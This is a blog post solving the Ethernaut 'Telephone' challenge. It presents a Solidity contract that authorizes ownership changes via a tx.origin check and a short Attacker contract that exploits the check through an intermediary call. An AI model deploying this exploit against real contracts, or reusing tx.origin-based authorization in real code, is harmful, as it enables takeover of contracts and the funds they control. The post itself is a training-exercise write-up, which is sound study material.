Ethernaut: 4. Telephone

#solidity #ethereum #openzeppelin #security

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

contract Telephone {
  address public owner;

  constructor() public {
    owner = msg.sender;
  }

  function changeOwner(address _owner) public {
    if (tx.origin != msg.sender) {
      owner = _owner;
    }
  }
}

The tx.origin is the address that creates the transaction, and msg.sender is the sender of the current message. As such, tx.origin == msg.sender is true if message sender is an ethereum account; or false if the message sender is a contract. So, we want tx.origin != msg.sender to become the owner of the target, we just need to write a contract and call that function.

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

interface Telephone { 
  function changeOwner(address _owner) external;
}

contract Attacker {
  Telephone telephoneTarget;

  constructor(address _target) {
    telephoneTarget = Telephone(_target);
  }

  function pwn() public {
    require(msg.sender == tx.origin, "Who is attacking? :D");
    telephoneTarget.changeOwner(tx.origin);
  }
}

Simplify your DevOps and maximize your time.

Since 2007, Heroku has been the go-to platform for developers as it monitors uptime, performance, and infrastructure concerns, allowing you to focus on writing code.

Learn More

DEV Community

Ethernaut: 4. Telephone

Simplify your DevOps and maximize your time.

Top comments (0)

Create up to 10 Postgres Databases on Neon's free plan.

Read next

Using the skip_before Method in RSpec

AI-Powered Code Generation: Opportunities and Risks

Revolutionizing Engineering: The Future of AI-Aided Tools

The Bored Ape Revolution: From Digital Art to Open Source Funding

Okay